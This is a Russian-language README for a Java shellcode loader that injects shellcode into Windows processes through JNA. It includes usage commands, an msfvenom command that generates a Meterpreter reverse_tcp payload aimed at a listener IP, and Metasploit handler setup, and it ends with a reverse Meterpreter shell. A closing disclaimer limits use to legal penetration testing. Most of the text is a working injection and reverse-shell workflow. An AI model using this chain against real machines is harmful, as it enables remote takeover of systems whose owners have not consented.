
Загрузчик шеллкода на основе Java
Загрузчик ShellCode, реализованный на Java, совместим с 32-битными и 64-битными платформами.
Основной принцип — использование JNA для вызова Windows API и внедрения shellcode.
Среда выполнения: JRE >= 1.5
Примечание: этот проект уже встроен в модуль ShellCodeLoader в yzddmr6/As-Exploits.
maven package
По умолчанию внедрение выполняется в случайный 32-битный процесс, используйте 32-битный shellcode
java -jar ShellcodeLoader.jar shellcode_hex
Внедрение x64 shellcode
java -jar ShellcodeLoader.jar --x64 shellcode_hex
Генерация ShellCode в hex-формате
┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.10 LPORT=4444 -f hex
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of hex file: 708 bytes
fce88f0000006089e531d2648b5....
Затем запускаем прослушивание
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.88.10
set LPORT 4444
exploit -j
java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5....
И вы получите обратный Meterpreter

Данный проект предназначен только для легального тестирования на проникновение и для изучения энтузиастами. Не используйте его в незаконных целях, в противном случае вы несёте всю ответственность самостоятельно.